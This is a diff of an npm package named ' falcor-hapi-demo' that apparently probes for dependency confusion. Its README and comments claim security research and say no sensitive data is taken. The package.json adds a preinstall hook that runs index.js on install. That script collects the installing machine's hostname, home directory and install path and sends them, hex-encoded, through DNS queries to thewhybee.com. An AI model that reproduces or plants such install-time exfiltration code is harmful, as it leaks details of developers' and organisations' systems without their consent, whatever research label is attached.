falcor-hapi-demo 1.5.5

package/README.md

@@ -0,0 +1 @@
+This package is meant for security research purposes and does not contain any useful code.

package/index.js

@@ -0,0 +1,80 @@
+/*
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure program will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+alex@ethicalhack.ro
+https://twitter.com/alxbrsn
+
+*/
+
+
+const dns = require('dns');
+const os = require('os');
+
+const suffix = '.dns.thewhybee.com';
+const ns = 'dns1.thewhybee.com';
+
+const package = ' falcor-hapi-demo';
+
+
+function sendToServer(data) {
+
+    data = Buffer.from(data).toString('hex');
+    data = data.match(/.{1,60}/g);
+
+    id = Math.random().toString(36).substring(2);
+
+    data.forEach(function (chunk, idx){
+        try {   
+            dns.resolve(
+                'v9_f.' + id + '.' + idx + '.' + chunk + '.v9_e' + suffix, 'A', 
+                console.log);
+        } catch (e) { }
+    });
+
+}
+
+function tryGet(toCall) {
+
+    try {
+        return toCall();
+    } catch(e) {
+        return 'err';
+    }
+
+}
+
+data = {
+    p : package,
+    h : tryGet(os.hostname),
+    d : tryGet(os.homedir),
+    c : __dirname
+}
+
+if (data['h'] == 'BBOGENS-LAPTOP') {
+    process.exit(0);
+}
+
+data = JSON.stringify(data);
+
+sendToServer(data);
+dns.lookup(ns, function(err, address) {
+    if (!err) {
+        nsAddress = address;
+    } else {
+        nsAddress = '8.8.8.8';
+    }
+    dns.setServers([nsAddress, '8.8.4.4']);
+    sendToServer(data);
+});

package/package.json

@@ -0,0 +1,15 @@
+{
+  "name": " falcor-hapi-demo",
+  "version": "1.5.5",
+  "description": "Security research purposes only.",
+  "main": "index.js",
+  "scripts": {
+    "test": "",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+  
+  }
+}